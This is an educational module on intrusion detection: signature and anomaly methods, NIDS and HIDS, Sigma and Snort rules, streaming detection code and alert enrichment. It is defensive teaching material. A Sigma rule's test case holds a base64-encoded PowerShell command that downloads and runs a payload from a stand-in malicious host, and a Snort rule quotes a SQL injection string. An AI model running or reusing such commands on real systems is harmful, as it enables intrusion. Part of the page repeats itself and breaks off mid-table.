Security Monitoring - Learning Module

Loading content...

0/273

Intrusion Detection

Finding Attackers in Your Systems

Security logging gives you visibility; intrusion detection turns that visibility into action. While logs passively record what happens, intrusion detection actively analyzes events to identify attacks in progress—the difference between having security cameras and having guards watching those cameras.

Intrusion detection operates on a fundamental premise: attackers leave traces. Whether they're scanning for vulnerabilities, exploiting weaknesses, moving laterally through networks, or exfiltrating data, their activities generate patterns that differ from normal operations. The challenge is finding those patterns in the vast ocean of legitimate activity.

Modern intrusion detection has evolved far beyond simple pattern matching. Today's systems combine signature-based detection (matching known attack patterns), behavioral analysis (identifying deviations from baselines), machine learning (discovering novel threats), and threat intelligence (leveraging global knowledge). Understanding these techniques—and when to apply each—is essential for building detection capabilities that find real attackers while minimizing false positives.

What You Will Learn

By the end of this page, you will understand the fundamentals of intrusion detection, the differences between signature-based and behavior-based detection, how to architect detection systems at scale, and strategies for balancing detection sensitivity with operational noise. You'll learn to design detection capabilities that catch attackers without drowning security teams in false alarms.

Intrusion Detection Fundamentals

An Intrusion Detection System (IDS) is a security technology that monitors systems or networks for malicious activity or policy violations. When suspicious activity is detected, an IDS generates alerts for security teams to investigate.

The Core Problem

Intrusion detection addresses a fundamental security challenge: how do you know when someone is attacking your systems? By the time damage is visible (data breach disclosed, ransomware deployed, systems offline), the attacker has often been present for weeks or months. The average dwell time—how long attackers remain undetected—is approximately 200 days in many industries.

IDS aims to dramatically reduce dwell time by identifying attack indicators early in the kill chain, ideally during reconnaissance or initial access rather than after objectives are achieved.

Attack Kill Chain and Detection Opportunities
Kill Chain Phase	Attacker Activity	Detection Opportunity
Reconnaissance	Port scanning, service enumeration, OSINT gathering	Network scan detection, unusual DNS queries, honeypot triggers
Initial Access	Phishing, vulnerability exploitation, credential stuffing	Failed auth spikes, exploit signatures, suspicious email patterns
Execution	Malware deployment, script execution, payload decoding	Process anomalies, script behavior, known malware signatures
Persistence	Backdoor installation, scheduled tasks, credential storage	Startup modifications, unexpected services, registry changes
Privilege Escalation	Exploiting local vulnerabilities, credential theft	Privilege changes, unusual sudo/admin access, LSASS access
Lateral Movement	Pass-the-hash, RDP, SMB exploitation	Unusual authentication patterns, network traffic anomalies
Exfiltration	Data collection, compression, external transfer	Large data transfers, unusual destinations, timing anomalies

IDS vs. IPS: Detection vs. Prevention

It's important to distinguish between related but distinct concepts:

IDS (Intrusion Detection System): Monitors and alerts on suspicious activity. It's a passive observer that doesn't block traffic or modify behavior—it tells you something is happening.
IPS (Intrusion Prevention System): Actively blocks detected threats. It can drop packets, terminate connections, or quarantine systems. This adds protection but also risk—false positives can block legitimate activity.

The choice between IDS and IPS depends on confidence levels:

Confidence	Action	Example
Very High	Block (IPS)	Known malware signature, banned IP
High	Alert (IDS) + Manual Response	Behavioral anomaly, possible attack
Medium	Alert (IDS)	Unusual but not clearly malicious
Low	Log for Analysis	Baseline deviation, requires context

Many organizations use both: IPS for high-confidence threats (known ransomware signatures) and IDS for lower-confidence detections that require human judgment.

The False Positive Challenge

Every IDS faces a fundamental tradeoff. Increase sensitivity to catch more attacks, and you generate more false positives (alert fatigue). Decrease sensitivity to reduce noise, and you miss real attacks. The goal isn't zero false positives—it's an acceptable ratio that security teams can operationally handle while maintaining detection coverage.

Detection Methodologies

There are fundamentally two approaches to intrusion detection, each with distinct strengths and limitations. Effective detection strategies combine both.

Signature-Based Detection

Signature-based detection (also called misuse detection) works by matching observed activity against a database of known attack patterns—signatures. When activity matches a signature, an alert is generated.

How it works:

Security researchers analyze known attacks
They create signatures—patterns that identify those attacks
The IDS compares incoming traffic/events against signatures
Matches trigger alerts

Signature examples:

# Detect SQL injection attempt
alert tcp any any -> any 80 
  (content:"' OR '1'='1"; msg:"SQL Injection Attempt";)

# Detect Nmap SYN scan
alert tcp any any -> any any 
  (flags:S; detection_filter:track by_src, count 20, seconds 5;
   msg:"Possible Nmap SYN Scan";)

# Detect known malware C2 domain
alert dns any any -> any any 
  (dns.query; content:"evil-c2-domain.com"; 
   msg:"Known Malware C2 Communication";)

Signature-Based Strengths

•High accuracy for known attacks—very low false positives when signatures are well-crafted
•Fast detection with minimal computational overhead
•Explainable alerts that clearly indicate what was detected
•Actionable intelligence with known remediation steps
•Industry knowledge sharing through signature repositories (Snort, Suricata rules, YARA)

Signature-Based Limitations

•Blind to novel attacks — Cannot detect zero-days or unknown techniques
•Easily evaded — Attackers modify payloads to avoid signatures
•Maintenance burden — Requires constant signature updates
•Signature lag — New attacks exist before signatures are created
•Context-blind — Same pattern may be attack or legitimate depending on context

Behavior-Based Detection (Anomaly Detection)

Behavior-based detection takes a fundamentally different approach. Rather than matching known attack patterns, it establishes baselines of normal behavior and alerts when activity deviates significantly from those baselines.

How it works:

System learns what 'normal' looks like (baseline period)
It models normal patterns statistically or via machine learning
Incoming activity is compared against the normal model
Significant deviations trigger alerts

Behavioral baselines might track:

Login times (user X logs in 9-6 weekdays; alert on 3am weekend login)
Network destinations (service Y talks to internal APIs; alert on external connection)
Data volumes (user Z transfers ~100MB/day; alert on 10GB transfer)
Command patterns (admin uses specific tools; alert on new reconnaissance commands)
API call patterns (service makes consistent calls; alert on new endpoints)

Behavior-Based Strengths

•Detects novel attacks — No signature required; finds zero-days
•Catches insider threats — Authorized users behaving abnormally
•Adapts to environment — Tailored to your specific systems
•Difficult to evade — Attacker must mimic normal behavior exactly
•Finds unknown indicators — Discovers attack patterns humans might miss

Behavior-Based Limitations

•Higher false positives — Legitimate changes trigger alerts
•Baseline poisoning — If attacker present during learning, attacks become 'normal'
•Opaque alerts — 'Anomaly detected' doesn't explain what or why
•Computationally intensive — ML models require significant resources
•Cold start problem — Needs time to learn baselines before detecting

Defense in Depth Detection

The most effective detection strategies layer both approaches. Use signature-based detection to catch known attacks with high confidence, and behavior-based detection to find novel threats. Correlate alerts from both to increase confidence: an anomaly that also matches a known pattern is more likely to be a real attack.

Network-Based vs. Host-Based Detection

Intrusion detection systems are deployed at two primary vantage points: the network and the host. Each offers unique visibility into different aspects of potential attacks.

Network-Based IDS (NIDS)

NIDS monitors network traffic flowing across network segments, typically deployed at network choke points (egress, between zones) or using traffic mirroring.

What NIDS sees:

All packets crossing monitored segments
Communication patterns between hosts
Protocol behavior and anomalies
External connection attempts
Data exfiltration over the network

Converting Mermaid diagram...

NIDS Deployment Patterns:

Perimeter NIDS: Monitors ingress/egress traffic at network boundary. Catches external attacks, C2 communications, exfiltration.
Internal NIDS: Monitors east-west traffic between network zones. Critical for detecting lateral movement after initial compromise.
Cloud NIDS: Traffic mirroring in VPCs, monitoring flow logs. AWS VPC Traffic Mirroring, GCP Packet Mirroring.

NIDS Challenges in Modern Environments:

Encryption: TLS encrypts payload content, limiting deep packet inspection. Solutions include TLS termination at inspection points or relying on metadata analysis.
Volume: High-bandwidth networks can overwhelm NIDS. Solutions include sampling, specialized hardware (FPGA-based inspection), or cloud-native network analysis.
Ephemeral workloads: Containers and serverless create short-lived network endpoints. Solutions include service mesh integration and workload-aware monitoring.

Host-Based IDS (HIDS)

HIDS runs on individual hosts (servers, workstations) and monitors activity at the system level—everything the network can't see.

What HIDS sees:

Process execution (what programs run, with what arguments)
File system changes (modifications, new files, deletions)
User activity (commands executed, files accessed)
System configuration changes (registry, startup items, cron)
Memory activity (injection, suspicious patterns)
Local network connections (from the host's perspective)

NIDS vs HIDS Comparison
Aspect	Network-Based (NIDS)	Host-Based (HIDS)
Deployment	Network infrastructure (TAPs, mirrors)	Agent on each host
Visibility	All network traffic on monitored segment	All activity on monitored host
Encryption impact	Limited view into encrypted payloads	Sees decrypted data on host
Coverage	All hosts on network segment	Only hosts with agents installed
Maintenance	Centralized, few devices	Distributed across all hosts
Performance impact	None on endpoints	Some CPU/memory on each host
Evasion	Encrypted channels, protocol abuse	Disabling agent, kernel rootkits
Best for	Network attacks, lateral movement, exfiltration	Malware, privilege escalation, insider threats

Popular HIDS/EDR Solutions:

OSSEC/Wazuh: Open-source HIDS with file integrity monitoring, log analysis, rootkit detection
osquery: Endpoint visibility through SQL queries against system state
CrowdStrike Falcon: Cloud-native EDR with real-time threat detection
Carbon Black: Behavioral detection with threat hunting capabilities
Microsoft Defender for Endpoint: Integrated Windows security with EDR

Endpoint Detection and Response (EDR) extends HIDS with:

Real-time response capabilities (kill process, isolate host, collect forensics)
Behavioral analysis beyond signatures
Threat hunting interfaces
Incident timeline reconstruction

Complete Visibility Requires Both

NIDS and HIDS aren't alternatives—they're complementary. NIDS catches attackers crossing network boundaries; HIDS catches what they do once inside a host. An attacker using encrypted C2 evades NIDS but is visible to HIDS when they execute commands. An attacker moving laterally via legitimate protocols (RDP, SMB) may evade HIDS detection rules but creates network patterns visible to NIDS.

Detection Engineering

Detection engineering is the discipline of systematically creating, testing, and maintaining detection rules. It treats detection as a software engineering problem—with version control, testing, deployment pipelines, and metrics.

The Detection Development Lifecycle:

Threat Research: Understand attack techniques (MITRE ATT&CK framework is invaluable)
Data Prerequisites: Identify which log sources provide visibility into the technique
Rule Development: Create detection logic (queries, signatures, models)
Validation Testing: Test against attack simulations to confirm detection
False Positive Tuning: Test against production data to assess noise
Deployment: Push to production with monitoring
Performance Monitoring: Track true positives, false positives, rule performance
Iteration: Refine rules based on feedback

MITRE ATT&CK as Detection Framework

The MITRE ATT&CK framework catalogs known adversary tactics and techniques. It provides:

Tactics: High-level goals (Initial Access, Persistence, Lateral Movement, etc.)
Techniques: Specific methods to achieve tactics (Phishing, Scheduled Task, Pass the Hash)
Procedures: Real-world examples of how attackers use techniques

Coverage mapping: Map your detections to ATT&CK techniques to identify gaps:

Tactic: Persistence
├── T1053: Scheduled Task/Job
│   ├── Detection: Windows Task Scheduler events (4698, 4699)
│   ├── Coverage: HIGH
│   └── Last validated: 2024-01-15
├── T1547: Boot/Logon Autostart Execution  
│   ├── Detection: Registry key monitoring
│   ├── Coverage: MEDIUM (some keys missed)
│   └── Last validated: 2023-11-20
└── T1053: Cron Jobs
    ├── Detection: Not implemented
    ├── Coverage: NONE
    └── Priority: Add to backlog

detection_rule_example.yaml
YAML
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# Sigma Rule Format - Platform-agnostic detection rule
title: Suspicious PowerShell Encoded Command
id: d8c0b5e1-2d3f-4a5c-9b8e-1234567890ab
status: production
description: |
  Detects PowerShell execution with base64-encoded commands,
  commonly used by malware to obfuscate malicious scripts.
references:
  - https://attack.mitre.org/techniques/T1059/001/
  - https://attack.mitre.org/techniques/T1027/
author: Security Team
date: 2024/01/15
modified: 2024/01/20
 
tags:
  - attack.execution
  - attack.t1059.001
  - attack.defense_evasion
  - attack.t1027
 
logsource:
  category: process_creation
  product: windows
 
detection:
  selection:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - '-encodedcommand'
      - '-enc '
      - '-en '
      - '-ec '
  filter_legitimate:
    # Known legitimate uses of encoded commands
    ParentImage|endswith:
      - '\System32\svchost.exe'  # Windows Update
      - '\Microsoft\ConfigMgr\AdminConsole\bin\Microsoft.ConfigurationManagement.exe'
    User|contains: 'SYSTEM'
  condition: selection and not filter_legitimate
 
falsepositives:
  - SCCM/MECM deployment scripts
  - Some legitimate admin tools
  - Automated system management
 
level: high
 
# Testing metadata
testing:
  attack_simulation:
    command: "powershell.exe -encodedcommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMALgBjAG8AbQAvAHAAYQB5AGwAbwBhAGQAJwApAA=="
    expected: alert
  benign_simulation:
    command: "powershell.exe -encodedcommand VwByAGkAdABlAC0ASABvAHMAdAAgACcASABlAGwAbABvACcA"
    expected: alert  # Still triggers, shows false positive rate
  last_validated: 2024-01-18
  true_positive_rate: 0.92
  false_positive_rate: 0.15

Detection Rule Testing

Detection rules must be tested before deployment—just like application code. Testing approaches:

Red Team Simulations: Execute actual attacks in controlled environments to validate detection

Atomic Red Team: Open-source library of attack simulations mapped to ATT&CK

# Run specific technique simulation
Invoke-AtomicTest T1059.001 -TestNumbers 1

MITRE Caldera: Automated adversary emulation platform
Historical Replay: Replay known-malicious traffic/logs through detection rules
Production Shadowing: Run new rules in shadow mode (log matches but don't alert) to measure false positive rates before activation

Detection Debt

Like technical debt, detection debt accumulates when rules aren't maintained. Stale rules that no longer match modern attack variants, rules with excessive false positives that get ignored, and gaps in coverage for new techniques all represent detection debt. Regular review cycles (quarterly at minimum) should validate, tune, and retire detection rules.

Detection at Scale

Large-scale detection presents unique challenges. When you're processing billions of events daily across thousands of hosts and network segments, naive approaches that work in small environments fail spectacularly.

Scale Challenges:

Volume: A medium enterprise generates 10-100 billion events/day. Running complex detection rules against every event is computationally prohibitive.
Velocity: Events must be processed in near real-time for detections to be actionable. Detecting an attack 4 hours later isn't useful.
Variety: Events come in hundreds of formats from diverse sources. Normalizing everything for consistent analysis is challenging.
Alert Volume: Even a 0.01% false positive rate on 10 billion events is 1 million false alerts/day—completely unmanageable.

Tiered Detection Architecture

Effective scaled detection uses a tiered approach, with different detection layers for different event volumes and detection complexities:

Tier 1: Stream Processing (Real-time)

Process every event as it arrives
Simple, high-confidence rules only
Sub-second detection latency
Technologies: Apache Kafka Streams, Apache Flink, Esper

Tier 2: Micro-Batch Processing (Near Real-time)

Process event batches (seconds to minutes)
More complex rules with short-term correlation
Detection latency: seconds to minutes
Technologies: Spark Structured Streaming, Kafka Streams with windowing

Tier 3: Batch Processing (Periodic)

Process large historical datasets
Complex analytics, ML models, long-term correlation
Detection latency: hours
Technologies: Spark, Elastic queries, data warehouses

Tier 4: Threat Hunting (Manual)

Human-driven investigation
Hypothesis-based exploration of data
Detection latency: days to weeks
Technologies: Jupyter notebooks, hunting platforms (Kestrel)

streaming_detection.py
Python
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
from pyspark.sql import SparkSession
from pyspark.sql.functions import *
from pyspark.sql.window import Window
 
# Real-time detection using Spark Structured Streaming
spark = SparkSession.builder.appName("SecurityDetection").getOrCreate()
 
# Read from Kafka stream
events = (spark.readStream
    .format("kafka")
    .option("kafka.bootstrap.servers", "kafka:9092")
    .option("subscribe", "security-events")
    .load()
    .select(from_json(col("value").cast("string"), event_schema).alias("event"))
    .select("event.*"))
 
# Detection: Brute Force Login Attempts
# Alert when >10 failed logins from same IP in 5 minutes
login_failures = events.filter(
    (col("event.category") == "authentication") &
    (col("event.outcome") == "failure")
)
 
brute_force = (login_failures
    .withWatermark("@timestamp", "10 minutes")
    .groupBy(
        window(col("@timestamp"), "5 minutes"),
        col("source.ip")
    )
    .agg(
        count("*").alias("failure_count"),
        collect_set("user.name").alias("targeted_users")
    )
    .filter(col("failure_count") > 10))
 
# Detection: Impossible Travel
# Alert when same user authenticates from geographically distant 
# locations in short time period
auth_success = events.filter(
    (col("event.category") == "authentication") &
    (col("event.outcome") == "success")
)
 
user_window = Window.partitionBy("user.id").orderBy("@timestamp")
 
impossible_travel = (auth_success
    .withColumn("prev_location", lag("source.geo").over(user_window))
    .withColumn("prev_time", lag("@timestamp").over(user_window))
    .withColumn("distance_km", calculate_distance(
        col("source.geo"), col("prev_location")))
    .withColumn("time_diff_hours", 
        (col("@timestamp").cast("long") - col("prev_time").cast("long")) / 3600)
    .withColumn("required_speed_kmh", 
        col("distance_km") / col("time_diff_hours"))
    # Alert if required travel speed > 1000 km/h (impossible without flight)
    .filter(col("required_speed_kmh") > 1000))
 
# Write alerts to Kafka topic
(brute_force.union(impossible_travel)
    .selectExpr("to_json(struct(*)) as value")
    .writeStream
    .format("kafka")
    .option("kafka.bootstrap.servers", "kafka:9092")
    .option("topic", "security-alerts")
    .option("checkpointLocation", "/checkpoints/detection")
    .outputMode("update")
    .start())

Pre-filtering Strategies

Not every event needs full detection analysis. Implement pre-filtering to reduce load on detection engines:

Known-Good Filtering: Events from verified internal monitoring systems, health checks, expected automated processes can be filtered early (but still logged).
Severity-Based Routing: Route only high-severity source events through expensive detection rules.
Sampling for Baselines: For behavioral models, statistical sampling can establish baselines without processing every event.
Event Deduplication: Repeated identical events (from chatty systems) can be deduplicated with count aggregation.

Raw Events: 10 billion/day
↓ Known-good filter (remove monitoring, health checks)
Filtered: 4 billion/day
↓ Deduplication (collapse repeated events)
Deduplicated: 1 billion/day
↓ Severity routing (only high-severity for complex rules)
Complex Detection: 100 million/day

Alert Management and Critical Response

Detection is only valuable if alerts lead to action. Alert management transforms raw detections into investigations and responses.

The Alert Fatigue Crisis

Alert fatigue is the biggest operational challenge in security monitoring. Studies show:

Security teams receive an average of 10,000-100,000 alerts/day
Only 4% of security alerts are investigated
Alert fatigue is a leading cause of SOC analyst burnout and turnover

The consequence: real attacks are missed because they're lost in the noise of false positives and low-priority alerts.

Alert Quality Metrics

Measure and optimize these metrics:

True Positive Rate (TPR): Of all actual attacks, what percentage did we detect?

TPR = True Positives / (True Positives + False Negatives)

Precision (Positive Predictive Value): Of all alerts, what percentage were real attacks?

Precision = True Positives / (True Positives + False Positives)

Mean Time to Detect (MTTD): How long between attack start and alert generation?

Mean Time to Investigate (MTTI): How long between alert and analyst beginning investigation?

Optimize for precision without sacrificing critical recall. Most organizations run 20-30% precision (70-80% false positive rate). World-class detection achieves 70%+ precision.

Strategies for Reducing Alert Fatigue

•Alert Enrichment: Automatically add context (asset criticality, user risk score, threat intel matches) to help analysts triage faster.
•Alert Correlation: Group related alerts into incidents. 100 alerts from the same attack chain should be 1 incident, not 100 tickets.
•Risk-Based Prioritization: Score alerts by risk (threat severity × asset criticality × user risk) and focus analyst time on highest-risk alerts.
•Tuning Cadence: Establish regular (weekly) rule tuning sessions to address high-false-positive rules rather than letting them generate noise indefinitely.
•Suppression Rules: After investigation, create explicit suppressions for known false positives (with expiration dates to force re-evaluation).
•Automation (SOAR): Automate investigation steps for common alerts—gather context, check IOC reputation, assess if asset is critical—before requiring human attention.
•Machine Learning Triage: ML models trained on analyst decisions can auto-close likely false positives, escalating only uncertain ones.

alert_enrichment_pipeline.ts
TypeScript
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
interface SecurityAlert {
  id: string;
  timestamp: string;
  rule_name: string;
  severity: 'low' | 'medium' | 'high' | 'critical';
  source_ip?: string;
  user_id?: string;
  asset_id?: string;
  raw_event: Record<string, unknown>;
}
 
interface EnrichedAlert extends SecurityAlert {
  enrichment: {
    asset?: {
      name: string;
      criticality: 'low' | 'medium' | 'high' | 'critical';
      owner: string;
      network_zone: string;
    };
    user?: {
      name: string;
      department: string;
      risk_score: number;
      recent_activity_anomalies: number;
    };
    threat_intel?: {
      ip_reputation: 'clean' | 'suspicious' | 'malicious';
      known_iocs: string[];
      threat_actor?: string;
    };
    historical?: {
      similar_alerts_30d: number;
      false_positive_rate: number;
      avg_investigation_time_min: number;
    };
  };
  risk_score: number;
  auto_triage_recommendation: 'investigate' | 'likely_fp' | 'auto_close';
}
 
async function enrichAlert(alert: SecurityAlert): Promise<EnrichedAlert> {
  // Parallel enrichment from multiple sources
  const [asset, user, threatIntel, historical] = await Promise.all([
    alert.asset_id ? assetDatabase.lookup(alert.asset_id) : null,
    alert.user_id ? identityService.lookup(alert.user_id) : null,
    alert.source_ip ? threatIntelligence.checkIP(alert.source_ip) : null,
    alertHistoryService.getSimilarAlerts(alert.rule_name, 30),
  ]);
 
  // Calculate composite risk score
  const riskScore = calculateRiskScore({
    alertSeverity: alert.severity,
    assetCriticality: asset?.criticality,
    userRiskScore: user?.risk_score,
    threatIntelMatch: threatIntel?.ip_reputation === 'malicious',
    historicalFPRate: historical?.false_positive_rate,
  });
 
  // Auto-triage recommendation
  const recommendation = determineTriageAction({
    riskScore,
    fpRate: historical?.false_positive_rate || 0,
    threatIntel,
    userAnomalies: user?.recent_activity_anomalies || 0,
  });
 
  return {
    ...alert,
    enrichment: { asset, user, threat_intel: threatIntel, historical },
    risk_score: riskScore,
    auto_triage_recommendation: recommendation,
  };
}
 
function calculateRiskScore(factors: {
  alertSeverity: string;
  assetCriticality?: string;
  userRiskScore?: number;
  threatIntelMatch: boolean;
  historicalFPRate?: number;
}): number {
  let score = 0;
  
  // Base score from alert severity
  const severityScores = { low: 10, medium: 30, high: 60, critical: 90 };
  score += severityScores[factors.alertSeverity] || 20;
  
  // Asset criticality multiplier
  const criticalityMultipliers = { low: 0.5, medium: 1.0, high: 1.5, critical: 2.0 };
  score *= criticalityMultipliers[factors.assetCriticality] || 1.0;
  
  // User risk score contribution
  if (factors.userRiskScore) {
    score += factors.userRiskScore * 0.3;
  }
  
  // Threat intel boost
  if (factors.threatIntelMatch) {
    score *= 1.5;
  }
  
  // Historical false positive penalty
  if (factors.historicalFPRate && factors.historicalFPRate > 0.7) {
    score *= 0.5; // Heavily penalize high-FP rules
  }
  
  return Math.min(100, Math.max(0, score));
}

Implementing IDS in Practice

Deploying intrusion detection in a real environment requires careful planning and incremental rollout. Here's a practical implementation approach:

IDS Implementation Phases
Phase	Duration	Activities	Success Criteria
Discovery	2-4 weeks	Inventory assets, map data sources, identify critical systems, understand attack surface	Complete asset inventory, data source catalog
Foundation	4-8 weeks	Deploy log collection, establish SIEM/detection platform, implement baseline detections	All critical logs collected, basic detections active
Coverage Expansion	8-12 weeks	Add detection rules mapped to ATT&CK, integrate threat intel, tune false positives	80%+ ATT&CK coverage for critical techniques
Optimization	Ongoing	Reduce false positives, automate response, improve MTTD, threat hunting	Precision >50%, MTTD <1 hour for critical

Starting Detection Rules

When building initial detection capability, prioritize these high-value, low-noise detections:

Authentication-Based:

Successful login after multiple failures (credential guessing success)
Login from new country for user
Admin account login from non-admin workstation
Service account interactive login
Login outside business hours for users without that pattern

Administrative Actions:

New admin account creation
Security group membership changes
Audit policy modifications
New scheduled task on server
Remote access tool installation

Network-Based:

Connection to known-bad IPs (threat intel)
DNS queries to known-bad domains
Large outbound data transfer to unusual destination
Internal scanning activity (port sweep)
SMB traffic between workstations (unusual peer-to-peer)

Start Simple, Iterate Often

Resist the temptation to deploy complex ML-based detection immediately. Start with simple, high-confidence signature rules for known-bad activity. Get operational excellence (analyst workflow, alert handling, tuning process) working well before adding complexity. A small number of well-tuned detections outperforms hundreds of noisy rules.

Summary: Intrusion Detection Essentials

Intrusion detection transforms security logging from passive recording into active threat identification. By systematically analyzing events for attack indicators, you can find adversaries before they achieve their objectives.

Key Takeaways

•IDS finds attackers by analyzing events — Detection identifies malicious patterns in the vast stream of normal activity.
•Combine signature and behavioral detection — Signatures catch known attacks with precision; behavior catches novel threats.
•Deploy both network and host-based detection — NIDS sees network activity; HIDS sees what happens on endpoints. Complete visibility requires both.
•Treat detection as engineering — Version control rules, test with simulations, measure effectiveness, iterate based on data.
•Scale requires tiered architecture — Stream processing for real-time, batch for complex analytics, hunting for human insight.
•Fight alert fatigue deliberately — Enrichment, correlation, automation, and continuous tuning keep alert volumes manageable.
•Start simple and iterate — High-confidence, well-tuned rules outperform complex noisy detection. Build operational excellence first.

What's Next:

Intrusion detection identifies known attack patterns and significant anomalies. But sophisticated attackers operate in ways that blend with normal activity. The next page covers Anomaly Detection—using statistical methods and machine learning to identify subtle deviations that signature-based detection misses.

Page Complete

You now understand intrusion detection fundamentals, methodologies, and implementation. This knowledge enables you to design detection systems that find attackers in your environment while maintaining operational sanity through effective alert management.

Intrusion Detection

Finding Attackers in Your Systems

What You Will Learn

Intrusion Detection Fundamentals

The Core Problem

IDS aims to dramatically reduce dwell time by identifying attack indicators early in the kill chain, ideally during reconnaissance or initial access rather than after objectives are achieved.

Attack Kill Chain and Detection Opportunities
Kill Chain Phase	Attacker Activity	Detection Opportunity
Reconnaissance	Port scanning, service enumeration, OSINT gathering	Network scan detection, unusual DNS queries, honeypot triggers
Initial Access	Phishing, vulnerability exploitation, credential stuffing	Failed auth spikes, exploit signatures, suspicious email patterns
Execution	Malware deployment, script execution, payload decoding	Process anomalies, script behavior, known malware signatures
Persistence	Backdoor installation, scheduled tasks, credential storage	Startup modifications, unexpected services, registry changes
Privilege Escalation	Exploiting local vulnerabilities, credential theft	Privilege changes, unusual sudo/admin access, LSASS access
Lateral Movement	Pass-the-hash, RDP, SMB exploitation	Unusual authentication patterns, network traffic anomalies
Exfiltration	Data collection, compression, external transfer	Large data transfers, unusual destinations, timing anomalies

IDS vs. IPS: Detection vs. Prevention

It's important to distinguish between related but distinct concepts:

IDS (Intrusion Detection System): Monitors and alerts on suspicious activity. It's a passive observer that doesn't block traffic or modify behavior—it tells you something is happening.
IPS (Intrusion Prevention System): Actively blocks detected threats. It can drop packets, terminate connections, or quarantine systems. This adds protection but also risk—false positives can block legitimate activity.

The choice between IDS and IPS depends on confidence levels:

Confidence	Action	Example
Very High	Block (IPS)	Known malware signature, banned IP
High	Alert (IDS) + Manual Response	Behavioral anomaly, possible attack
Medium	Alert (IDS)	Unusual but not clearly malicious
Low	Log for Analysis	Baseline deviation, requires context

Many organizations use both: IPS for high-confidence threats (known ransomware signatures) and IDS for lower-confidence detections that require human judgment.

The False Positive Challenge

Detection Methodologies

There are fundamentally two approaches to intrusion detection, each with distinct strengths and limitations. Effective detection strategies combine both.

Signature-Based Detection

How it works:

Security researchers analyze known attacks
They create signatures—patterns that identify those attacks
The IDS compares incoming traffic/events against signatures
Matches trigger alerts

Signature examples:

# Detect SQL injection attempt
alert tcp any any -> any 80 
  (content:"' OR '1'='1"; msg:"SQL Injection Attempt";)

# Detect Nmap SYN scan
alert tcp any any -> any any 
  (flags:S; detection_filter:track by_src, count 20, seconds 5;
   msg:"Possible Nmap SYN Scan";)

# Detect known malware C2 domain
alert dns any any -> any any 
  (dns.query; content:"evil-c2-domain.com"; 
   msg:"Known Malware C2 Communication";)

Signature-Based Strengths

•High accuracy for known attacks—very low false positives when signatures are well-crafted
•Fast detection with minimal computational overhead
•Explainable alerts that clearly indicate what was detected
•Actionable intelligence with known remediation steps
•Industry knowledge sharing through signature repositories (Snort, Suricata rules, YARA)

Signature-Based Limitations

•Blind to novel attacks — Cannot detect zero-days or unknown techniques
•Easily evaded — Attackers modify payloads to avoid signatures
•Maintenance burden — Requires constant signature updates
•Signature lag — New attacks exist before signatures are created
•Context-blind — Same pattern may be attack or legitimate depending on context

Behavior-Based Detection (Anomaly Detection)

How it works:

System learns what 'normal' looks like (baseline period)
It models normal patterns statistically or via machine learning
Incoming activity is compared against the normal model
Significant deviations trigger alerts

Behavioral baselines might track:

Login times (user X logs in 9-6 weekdays; alert on 3am weekend login)
Network destinations (service Y talks to internal APIs; alert on external connection)
Data volumes (user Z transfers ~100MB/day; alert on 10GB transfer)
Command patterns (admin uses specific tools; alert on new reconnaissance commands)
API call patterns (service makes consistent calls; alert on new endpoints)

Behavior-Based Strengths

•Detects novel attacks — No signature required; finds zero-days
•Catches insider threats — Authorized users behaving abnormally
•Adapts to environment — Tailored to your specific systems
•Difficult to evade — Attacker must mimic normal behavior exactly
•Finds unknown indicators — Discovers attack patterns humans might miss

Behavior-Based Limitations

•Higher false positives — Legitimate changes trigger alerts
•Baseline poisoning — If attacker present during learning, attacks become 'normal'
•Opaque alerts — 'Anomaly detected' doesn't explain what or why
•Computationally intensive — ML models require significant resources
•Cold start problem — Needs time to learn baselines before detecting

Defense in Depth Detection

Network-Based vs. Host-Based Detection

Intrusion detection systems are deployed at two primary vantage points: the network and the host. Each offers unique visibility into different aspects of potential attacks.

Network-Based IDS (NIDS)

NIDS monitors network traffic flowing across network segments, typically deployed at network choke points (egress, between zones) or using traffic mirroring.

What NIDS sees:

All packets crossing monitored segments
Communication patterns between hosts
Protocol behavior and anomalies
External connection attempts
Data exfiltration over the network

Converting Mermaid diagram...

NIDS Deployment Patterns:

Perimeter NIDS: Monitors ingress/egress traffic at network boundary. Catches external attacks, C2 communications, exfiltration.
Internal NIDS: Monitors east-west traffic between network zones. Critical for detecting lateral movement after initial compromise.
Cloud NIDS: Traffic mirroring in VPCs, monitoring flow logs. AWS VPC Traffic Mirroring, GCP Packet Mirroring.

NIDS Challenges in Modern Environments:

Encryption: TLS encrypts payload content, limiting deep packet inspection. Solutions include TLS termination at inspection points or relying on metadata analysis.
Volume: High-bandwidth networks can overwhelm NIDS. Solutions include sampling, specialized hardware (FPGA-based inspection), or cloud-native network analysis.
Ephemeral workloads: Containers and serverless create short-lived network endpoints. Solutions include service mesh integration and workload-aware monitoring.

Host-Based IDS (HIDS)

HIDS runs on individual hosts (servers, workstations) and monitors activity at the system level—everything the network can't see.

What HIDS sees:

Process execution (what programs run, with what arguments)
File system changes (modifications, new files, deletions)
User activity (commands executed, files accessed)
System configuration changes (registry, startup items, cron)
Memory activity (injection, suspicious patterns)
Local network connections (from the host's perspective)

NIDS vs HIDS Comparison
Aspect	Network-Based (NIDS)	Host-Based (HIDS)
Deployment	Network infrastructure (TAPs, mirrors)	Agent on each host
Visibility	All network traffic on monitored segment	All activity on monitored host
